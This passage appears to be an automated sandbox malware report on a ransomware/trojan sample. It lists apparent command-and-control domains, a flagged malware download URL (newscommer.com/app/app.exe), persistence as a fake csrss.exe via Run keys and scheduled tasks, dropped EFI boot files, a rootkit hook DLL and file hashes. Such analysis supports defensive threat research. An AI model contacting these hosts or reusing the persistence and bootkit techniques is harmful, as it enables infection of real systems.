https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx	svchost.exe, 00000005.00000002.309058187.0000029B1CA3D000.00000004.00000001.sdmp	false		high
https://dev.ditu.live.com/REST/v1/Traffic/Incidents/	svchost.exe, 00000005.00000003.307762836.0000029B1CA59000.00000004.00000001.sdmp	false		high
https://t0.tiles.ditu.live.com/tiles/gen	svchost.exe, 00000005.00000003.307813476.0000029B1CA47000.00000004.00000001.sdmp	false		high
https://trumops.comhttps://retoti.comhttps://trumops.comhttps://retoti.comS-1-5-21-3853321935-212556	csrss.exe, 00000010.00000002.377377894.0000000016814000.00000004.00000001.sdmp, csrss.exe, 00000017.00000002.397738853.0000000016814000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://gais.cs.ccu.edu.tw/robot.php)Gulper	csrss.exe	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://dev.virtualearth.net/REST/v1/Routes/Walking	svchost.exe, 00000005.00000003.307750907.0000029B1CA62000.00000004.00000001.sdmp	false		high
https://logs.trumops.com	csrss.exe, 0000000E.00000003.379613534.00000000168D6000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.google.com/bot.html)tls:	csrss.exe	false		high
http://www.spidersoft.com)Wget/1.9	csrss.exe	false	Avira URL Cloud: safe	low
https://logs.trumops.comhttps://runmodes.com/api/loghttps://server8.trumops.comC:	csrss.exe, 0000000E.00000003.379613534.00000000168D6000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
https://trumops.comhttps://retoti.comServiceVersionServersVersionDistributorIDCampaignIDOSCaptionMic	4t4y4r89UZ.exe, 0000000A.00000002.327559047.00000000160BC000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000003.379613534.00000000168D6000.00000004.00000001.sdmp, csrss.exe, 00000010.00000002.377353014.0000000016810000.00000004.00000001.sdmp, csrss.exe, 00000017.00000002.397681987.000000001680E000.00000004.00000001.sdmp, csrss.exe, 00000022.00000002.391603610.0000000016810000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=	svchost.exe, 00000005.00000003.307846418.0000029B1CA41000.00000004.00000001.sdmp	false		high
https://retoti.com	4t4y4r89UZ.exe, 00000000.00000002.299163430.0000000015CC4000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.327559047.00000000160BC000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000003.379613534.00000000168D6000.00000004.00000001.sdmp, csrss.exe, 00000010.00000002.377353014.0000000016810000.00000004.00000001.sdmp, csrss.exe, 00000017.00000002.397681987.000000001680E000.00000004.00000001.sdmp, csrss.exe, 00000022.00000002.391603610.0000000016810000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://trumops.comif-unmodified-sinceillegal	4t4y4r89UZ.exe, 00000000.00000003.284065740.00000000058F0000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.317378119.0000000000400000.00000040.00020000.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://help.ya	csrss.exe	false	Avira URL Cloud: safe	unknown
https://dev.ditu.live.com/mapcontrol/logging.ashx	svchost.exe, 00000005.00000003.307750907.0000029B1CA62000.00000004.00000001.sdmp	false		high
https://dev.ditu.live.com/REST/v1/Imagery/Copyright/	svchost.exe, 00000005.00000003.307756763.0000029B1CA5E000.00000004.00000001.sdmp	false		high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=	svchost.exe, 00000005.00000003.286135165.0000029B1CA32000.00000004.00000001.sdmp	false		high
http://devlog.gregarius.net/docs/ua)Links	csrss.exe, csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://trumops.comServiceVersionServiceVersionServersVersionServersVersionDistributorIDCampaignIDOS	4t4y4r89UZ.exe, 00000000.00000002.299142381.0000000015CBA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://dev.virtualearth.net/REST/v1/Transit/Schedules/	svchost.exe, 00000005.00000003.307846418.0000029B1CA41000.00000004.00000001.sdmp	false		high
https://server8.trumops.comserver8.trumops.com:443server8.trumops.com:443tcpserver8.trumops.com	csrss.exe, 0000000E.00000003.378367742.00000000169DE000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://grub.org)Mozilla/5.0	csrss.exe	false	Avira URL Cloud: safe	low
http://www.everyfeed.c	csrss.exe	false	Avira URL Cloud: safe	unknown
https://turnitin.com/robot/crawlerinfo.html)gentraceback	csrss.exe, csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp	false		high
https://server8.trumops.com	csrss.exe, 0000000E.00000002.557421639.00000000168DE000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000003.379613534.00000000168D6000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.558065286.0000000016974000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://trumops.com	csrss.exe, 0000000E.00000002.556988618.0000000016892000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000003.379613534.00000000168D6000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.557380093.00000000168D6000.00000004.00000001.sdmp, csrss.exe, 00000010.00000002.377353014.0000000016810000.00000004.00000001.sdmp, csrss.exe, 00000017.00000002.397681987.000000001680E000.00000004.00000001.sdmp, csrss.exe, 00000022.00000002.391603610.0000000016810000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://builtwith.com/biup)	csrss.exe	false		high
http://www.bingmapsportal.comsv	svchost.exe, 00000005.00000002.309019102.0000029B1CA13000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.exabot.com/go/robot)Opera/9.80	csrss.exe	false	URL Reputation: safe	unknown
https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/	svchost.exe, 00000005.00000002.309058187.0000029B1CA3D000.00000004.00000001.sdmp	false		high
http://www.googlebot.com/bot.html)Links	csrss.exe	false	URL Reputation: safe	unknown
https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx	svchost.exe, 00000005.00000003.307750907.0000029B1CA62000.00000004.00000001.sdmp	false		high
http://search.msn.com/msnbot.htm)net/http:	csrss.exe, csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp	false		high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=	svchost.exe, 00000005.00000003.307775473.0000029B1CA40000.00000004.00000001.sdmp	false		high
https://trumops.comhttps://retoti.com	csrss.exe, 0000000E.00000002.557380093.00000000168D6000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://server8.trumops.comserver8.trumops.com:443server8.trumops.com:443tcpserver8.trumops.comws2_3	csrss.exe, 0000000E.00000003.378367742.00000000169DE000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://search.msn.com/msnbot.htm)msnbot/1.1	csrss.exe, csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Routes/	svchost.exe, 00000005.00000002.309058187.0000029B1CA3D000.00000004.00000001.sdmp	false		high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=	svchost.exe, 00000005.00000003.307775473.0000029B1CA40000.00000004.00000001.sdmp	false		high
https://server8.trumops.com/api/pollf	csrss.exe, 0000000E.00000002.556753831.0000000016861000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://trumops.com/api/install-failureinvalid	csrss.exe	false	Avira URL Cloud: safe	unknown
https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?	svchost.exe, 00000005.00000003.307762836.0000029B1CA59000.00000004.00000001.sdmp, svchost.exe, 00000005.00000003.307775473.0000029B1CA40000.00000004.00000001.sdmp	false		high
http://www.archive.org/details/archive.org_bot)Opera/9.80	csrss.exe	false		high
http://www.baidu.com/search/spider.htm)MobileSafari/600.1.4	4t4y4r89UZ.exe, 00000000.00000003.284065740.00000000058F0000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.317378119.0000000000400000.00000040.00020000.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp	false		high
http://yandex.com/bots)Opera/9.51	csrss.exe	false		high
http://www.google.com/bot.html)Mozilla/5.0	csrss.exe	false		high
https://activity.windows.comr	svchost.exe, 00000003.00000002.546936474.000001CE84443000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=	svchost.exe, 00000005.00000002.309058187.0000029B1CA3D000.00000004.00000001.sdmp, svchost.exe, 00000005.00000002.309019102.0000029B1CA13000.00000004.00000001.sdmp	false		high
https://%s.xboxlive.com	svchost.exe, 00000003.00000002.546936474.000001CE84443000.00000004.00000001.sdmp	false	URL Reputation: safe	low
https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=	svchost.exe, 00000005.00000003.307813476.0000029B1CA47000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Locations	svchost.exe, 00000005.00000003.307750907.0000029B1CA62000.00000004.00000001.sdmp	false		high
https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=	svchost.exe, 00000005.00000003.286135165.0000029B1CA32000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/mapcontrol/logging.ashx	svchost.exe, 00000005.00000003.307750907.0000029B1CA62000.00000004.00000001.sdmp	false		high
http://gohnot.com/61c75dbee3f325b4d87cddaf5bae3393	csrss.exe, 0000000E.00000003.380180308.000000001688A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://https://_bad_pdb_file.pdb	4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://archive.org/details/archive.org_bot)Mozilla/5.0	csrss.exe	false		high
https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=	svchost.exe, 00000005.00000003.307762836.0000029B1CA59000.00000004.00000001.sdmp	false		high
http://www.bloglines.com)F	csrss.exe	false	Avira URL Cloud: safe	low
https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/	svchost.exe, 00000005.00000003.307762836.0000029B1CA59000.00000004.00000001.sdmp	false		high
http://misc.yahoo.com.cn/he	csrss.exe	false	Avira URL Cloud: safe	unknown
https://dynamic.t	svchost.exe, 00000005.00000003.307813476.0000029B1CA47000.00000004.00000001.sdmp, svchost.exe, 00000005.00000003.307846418.0000029B1CA41000.00000004.00000001.sdmp, svchost.exe, 00000005.00000003.307775473.0000029B1CA40000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://newscommer.com/app/app.exe	csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp	true	URL Reputation: malware	unknown
http://www.google.com/feedfetcher.html)HKLM	csrss.exe	false		high
https://dev.virtualearth.net/REST/v1/Routes/Transit	svchost.exe, 00000005.00000003.307750907.0000029B1CA62000.00000004.00000001.sdmp	false		high
https://server8.trumops.comc=3e3f6b9a36a75d40&uuid=server8.trumops.com:443server8.trumops.com:443tcp	csrss.exe, 0000000E.00000002.558447548.0000000016AC4000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://crl.g	4t4y4r89UZ.exe, 00000000.00000002.293844995.0000000004C28000.00000040.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.320126645.0000000004BB5000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.553003907.0000000005200000.00000040.00000001.sdmp, csrss.exe, 00000010.00000002.364381433.0000000005200000.00000040.00000001.sdmp, csrss.exe, 00000017.00000002.393120243.0000000005200000.00000040.00000001.sdmp, csrss.exe, 00000022.00000002.387543295.0000000005200000.00000040.00000001.sdmp, csrss.exe, 00000032.00000002.400160271.0000000005200000.00000040.00000001.sdmp	false	URL Reputation: safe	unknown
https://blockchain.infoindex	csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.baidu.com/search/spide	csrss.exe	false		high
http://yandex.com/bots)Opera/9.80	csrss.exe	false		high
https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen	svchost.exe, 00000005.00000003.286135165.0000029B1CA32000.00000004.00000001.sdmp	false		high
https://sitescore.aiValue	csrss.exe, csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.avantbrowser.com)MOT-V9mm/00.62	csrss.exe, csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=	svchost.exe, 00000005.00000003.307762836.0000029B1CA59000.00000004.00000001.sdmp	false		high
http://search.msn.com/msnbot.htm)pkcs7:	4t4y4r89UZ.exe, 00000000.00000003.284065740.00000000058F0000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.317378119.0000000000400000.00000040.00020000.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp	false		high
https://activity.windows.com	svchost.exe, 00000003.00000002.546936474.000001CE84443000.00000004.00000001.sdmp	false		high
http://www.alexa.com/help/webmasters;	csrss.exe	false		high
http://www.google.com/adsbot.html)Encountered	csrss.exe	false		high
https://dev.ditu.live.com/REST/v1/Locations	svchost.exe, 00000005.00000003.307750907.0000029B1CA62000.00000004.00000001.sdmp	false		high
https://%s.dnet.xboxlive.com	svchost.exe, 00000003.00000002.546936474.000001CE84443000.00000004.00000001.sdmp	false	URL Reputation: safe	low
https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/	svchost.exe, 00000005.00000003.307762836.0000029B1CA59000.00000004.00000001.sdmp	false		high
https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=	svchost.exe, 00000005.00000003.307756763.0000029B1CA5E000.00000004.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
172.67.139.144	unknown	United States	13335	CLOUDFLARENETUS	false
104.21.34.203	runmodes.com	United States	13335	CLOUDFLARENETUS	false
104.21.79.9	server8.trumops.com	United States	13335	CLOUDFLARENETUS	false
172.67.207.136	unknown	United States	13335	CLOUDFLARENETUS	false
172.67.196.11	gohnot.com	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	519673
Start date:	11.11.2021
Start time:	01:56:09
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 14m 22s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	4t4y4r89UZ (renamed file extension from none to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	53
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.rans.troj.evad.winEXE@62/18@12/5
EGA Information:	Failed
HDC Information:	Successful, ratio: 96.7% (good quality ratio 50%) Quality average: 39.2% Quality standard deviation: 43.3%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, consent.exe, backgroundTaskHost.exe, svchost.exe TCP Packets have been reduced to 100 Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com Not all processes where analyzed, report is missing behavior information Report creation exceeded maximum time and may have missing behavior and disassembly information. Report creation exceeded maximum time and may have missing disassembly code information. Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
01:57:03	API Interceptor	9x Sleep call for process: 4t4y4r89UZ.exe modified
01:57:12	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run RoughSnow "C:\Windows\rss\csrss.exe"
01:57:20	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run RoughSnow "C:\Windows\rss\csrss.exe"
01:57:23	API Interceptor	9x Sleep call for process: csrss.exe modified
01:57:25	Task Scheduler	Run new task: csrss path: C:\Windows\rss\csrss.exe

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

B:\EFI\Boot\old.efi (copy) Download File
Process:	C:\Windows\rss\csrss.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	7680
Entropy (8bit):	4.486535052248291
Encrypted:	false
SSDEEP:	48:glTSYARWU4VIDJY5fxSgwG89gAgseSNhcl7HoE4h2KP+59L+1o7InTJ/R9W3afJX:stOWU+rpT8ZeSNul7IEkdAL+pt/63
MD5:	17ACB515B5FA45DEF030B191E5BC7991
SHA1:	539E0729C6FE8460F20A0DF044DCE5D3AB629E7C
SHA-256:	9FDB7C1359F3F2F7279F1DF4BDE648C080231ED21A22906E908EF3F91F0D00EE
SHA-512:	5057F569321E7F3E40CF427D87FBFD4331E33914A61FAB059AE870BC6C17640E63CDFB7AE323846F161B124875BA874BED3A674D434CA3E5BC8116F6600062EA
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................................................................................................................................................................................................PE..d................." .........................................................`.......!.......................................................................0...............P......<#...............................................................................text............................... ..h.data........ ......................@....pdata.......0......................@..H.xdata.......@......................@..B.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................................................

B:\EFI\Microsoft\Boot\fw.efi (copy) Download File
Process:	C:\Windows\rss\csrss.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	7680
Entropy (8bit):	4.486535052248291
Encrypted:	false
SSDEEP:	48:glTSYARWU4VIDJY5fxSgwG89gAgseSNhcl7HoE4h2KP+59L+1o7InTJ/R9W3afJX:stOWU+rpT8ZeSNul7IEkdAL+pt/63
MD5:	17ACB515B5FA45DEF030B191E5BC7991
SHA1:	539E0729C6FE8460F20A0DF044DCE5D3AB629E7C
SHA-256:	9FDB7C1359F3F2F7279F1DF4BDE648C080231ED21A22906E908EF3F91F0D00EE
SHA-512:	5057F569321E7F3E40CF427D87FBFD4331E33914A61FAB059AE870BC6C17640E63CDFB7AE323846F161B124875BA874BED3A674D434CA3E5BC8116F6600062EA
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................................................................................................................................................................................................PE..d................." .........................................................`.......!.......................................................................0...............P......<#...............................................................................text............................... ..h.data........ ......................@....pdata.......0......................@..H.xdata.......@......................@..B.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................................................

C:\EFI\Boot\EfiGuardDxe.efi Download File
Process:	C:\Windows\rss\csrss.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	279552
Entropy (8bit):	4.553173975914215
Encrypted:	false
SSDEEP:	3072:ekODsOuozgl9aXsRzZZZZrUhFapDL4k2yntc:ekeklesRD6yt
MD5:	2B84CB96AE6280C2020FA46E4A8A07D8
SHA1:	E920E40CFC0C6A805D657C8F23F9C0612CD39F59
SHA-256:	01E86A4DFE6E0DE7857B3CF2FAFD041C8B3A3241E00844CB6BFBD3BFAE2D36BC
SHA-512:	F1A6598116F78FBA1F9531301A7313AC204BAB3B7AEBC299F69F2ED406F4EDAFC3410DB860E93D0DC7C24398F5A7FF595764400F31A3A06679FD6EC0EFB116D9
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ..............................................................................................................................................................................................PE..d................." ................x........................................................................................................................P...............p.......................................................................................text.............................. ..h.data..............................@....pdata.......P.......8..............@..H.xdata..X....`.......<..............@..B.reloc.......p.......B..............@..B........................................................................................................................................................................................................................................................................................................................................................

C:\EFI\Boot\bootx64.efi Download File
Process:	C:\Windows\rss\csrss.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	7680
Entropy (8bit):	4.486535052248291
Encrypted:	false
SSDEEP:	48:glTSYARWU4VIDJY5fxSgwG89gAgseSNhcl7HoE4h2KP+59L+1o7InTJ/R9W3afJX:stOWU+rpT8ZeSNul7IEkdAL+pt/63
MD5:	17ACB515B5FA45DEF030B191E5BC7991
SHA1:	539E0729C6FE8460F20A0DF044DCE5D3AB629E7C
SHA-256:	9FDB7C1359F3F2F7279F1DF4BDE648C080231ED21A22906E908EF3F91F0D00EE
SHA-512:	5057F569321E7F3E40CF427D87FBFD4331E33914A61FAB059AE870BC6C17640E63CDFB7AE323846F161B124875BA874BED3A674D434CA3E5BC8116F6600062EA
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................................................................................................................................................................................................PE..d................." .........................................................`.......!.......................................................................0...............P......<#...............................................................................text............................... ..h.data........ ......................@....pdata.......0......................@..H.xdata.......@......................@..B.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................................................

C:\EFI\Microsoft\Boot\bootmgfw.efi Download File
Process:	C:\Windows\rss\csrss.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	7680
Entropy (8bit):	4.486535052248291
Encrypted:	false
SSDEEP:	48:glTSYARWU4VIDJY5fxSgwG89gAgseSNhcl7HoE4h2KP+59L+1o7InTJ/R9W3afJX:stOWU+rpT8ZeSNul7IEkdAL+pt/63
MD5:	17ACB515B5FA45DEF030B191E5BC7991
SHA1:	539E0729C6FE8460F20A0DF044DCE5D3AB629E7C
SHA-256:	9FDB7C1359F3F2F7279F1DF4BDE648C080231ED21A22906E908EF3F91F0D00EE
SHA-512:	5057F569321E7F3E40CF427D87FBFD4331E33914A61FAB059AE870BC6C17640E63CDFB7AE323846F161B124875BA874BED3A674D434CA3E5BC8116F6600062EA
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................................................................................................................................................................................................PE..d................." .........................................................`.......!.......................................................................0...............P......<#...............................................................................text............................... ..h.data........ ......................@....pdata.......0......................@..H.xdata.......@......................@..B.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\SyncVerbose.etl Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.11027387102746783
Encrypted:	false
SSDEEP:	12:26hzXm/Ey6q9995Ffsq3qQ10nMCldimE8eawHjc2i:26Ml68rZLyMCldzE9BHjcb
MD5:	59780508EC9D4F0D75A06B5CD8FDB782
SHA1:	7908F113274A3C5D2BA954AB1E914E5F73B66609
SHA-256:	9D15CA570CBA2201A2AA89A0757D23761054BDEB4EA7C69F50FECBE4998D4D14
SHA-512:	B7C95BC2C0B513E7007F8FFB008A54ABDD07B83BCDE6615811E84CAEA2FB8B761299AC7EB871AE12D365BE726B2ADDF5D631BB38E1D7486FFB272203133667DD
Malicious:	false
Reputation:	unknown
Preview:	........................................................................................)........................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................c3j,...... .....6..z............S.y.n.c.V.e.r.b.o.s.e...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.S.y.n.c.V.e.r.b.o.s.e...e.t.l...........P.P.........".......................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCircular.etl Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.1127826807463711
Encrypted:	false
SSDEEP:	12:KXm/Ey6q9995FfSTw1miM3qQ10nMCldimE8eawHza1miIQcE:/l68rSk1tMLyMCldzE9BHza1tIQZ
MD5:	212C7C49EC89D181D5A4009E8FB0CC8F
SHA1:	1332ABD28D67B9F97A94923F626D8D381D07A218
SHA-256:	87175704C0ED1C2564DBD4D91C9D150DC89AF92654A30AB2ADC8AC7B4258FC50
SHA-512:	A1D3672051A1CC05606B363D039D8D6FDD6F55BA1A1BE2A7CF7D06C594CE3D8EC7772762682DF7A8410974E3FB6009A1BBC72FA446A0DC84998FFB4C8943BFB6
Malicious:	false
Reputation:	unknown
Preview:	.................................................................................................................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................c3j,...... .......~z............U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...e.t.l.......P.P.........%.......................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.11264829878785992
Encrypted:	false
SSDEEP:	12:fXm/Ey6q9995FfIg1mK2P3qQ10nMCldimE8eawHza1mK/N:Ol68rIg1iPLyMCldzE9BHza17N
MD5:	8CA0CDD2FB3FA75BED06C9ABD3277C05
SHA1:	8493F6EA64D776A0CBD50BF83D3ADA5AEEF65AAF
SHA-256:	4F408F9E3A5C7550BE4DFC4E74BD8325E8FB347BD2D7A29E235F5EF0E9EC8FFD
SHA-512:	76E671DF103A3171048058E6B6A93B182F38C19B957D8DD347A1617748ADF60EBF9334F6DABC0BD74E3AEB69AE5CAAD1C7E411157BBD1CBC011820370AA6A8CB
Malicious:	false
Reputation:	unknown
Preview:	.........................................................................................6.......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................c3j,...... ......Iwz............U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...e.t.l.......P.P..........@......................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll Download File
Process:	C:\Windows\rss\csrss.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	101376
Entropy (8bit):	5.951577458824018
Encrypted:	false
SSDEEP:	3072:U3JJpaHtGsxJZ7zmaUMf2ETb4w1GMYbuT:csTF5U3EfndT
MD5:	09031A062610D77D685C9934318B4170
SHA1:	880F744184E7774F3D14C1BB857E21CC7FE89A6D
SHA-256:	778BD69AF403DF3C4E074C31B3850D71BF0E64524BEA4272A802CA9520B379DD
SHA-512:	9A276E1F0F55D35F2BF38EB093464F7065BDD30A660E6D1C62EED5E76D1FB2201567B89D9AE65D2D89DC99B142159E36FB73BE8D5E08252A975D50544A7CDA27
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Metadefender, Detection: 46%, Browse Antivirus: ReversingLabs, Detection: 59%
Reputation:	unknown
